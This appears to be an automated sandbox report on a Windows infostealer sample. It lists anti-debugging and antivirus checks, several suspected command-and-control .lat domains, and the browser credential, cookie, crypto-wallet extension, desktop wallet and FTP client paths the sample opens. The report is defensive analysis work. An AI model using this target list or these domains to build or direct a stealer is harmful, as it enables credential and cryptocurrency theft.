                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: NxqDwaYpbp.exe, 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                Source: NxqDwaYpbp.exe, 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                Source: NxqDwaYpbp.exe, 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                Source: NxqDwaYpbp.exe, 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                Source: NxqDwaYpbp.exe, 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                Source: NxqDwaYpbp.exe, 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                Source: NxqDwaYpbp.exe, 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                Source: NxqDwaYpbp.exe, 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                Source: NxqDwaYpbp.exe, 00000000.00000003.1295341573.00000000047D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: observerfry.lat
                Source: NxqDwaYpbp.exe, 00000000.00000002.1500119918.0000000000622000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 7Program Manager
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: NxqDwaYpbp.exe, 00000000.00000003.1465436603.00000000053F7000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498727425.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490170370.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1448029796.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1448012589.0000000005404000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501552431.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1504229183.0000000005408000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1465719103.0000000005404000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1453151032.0000000005407000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: NxqDwaYpbp.exe PID: 8044, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: NxqDwaYpbp.exe, 00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: NxqDwaYpbp.exe, 00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: NxqDwaYpbp.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: NxqDwaYpbp.exe, 00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: NxqDwaYpbp.exe, 00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: NxqDwaYpbp.exeString found in binary or memory: Wallets/Exodus
                Source: NxqDwaYpbp.exeString found in binary or memory: Wallets/Ethereum
                Source: NxqDwaYpbp.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: NxqDwaYpbp.exeString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
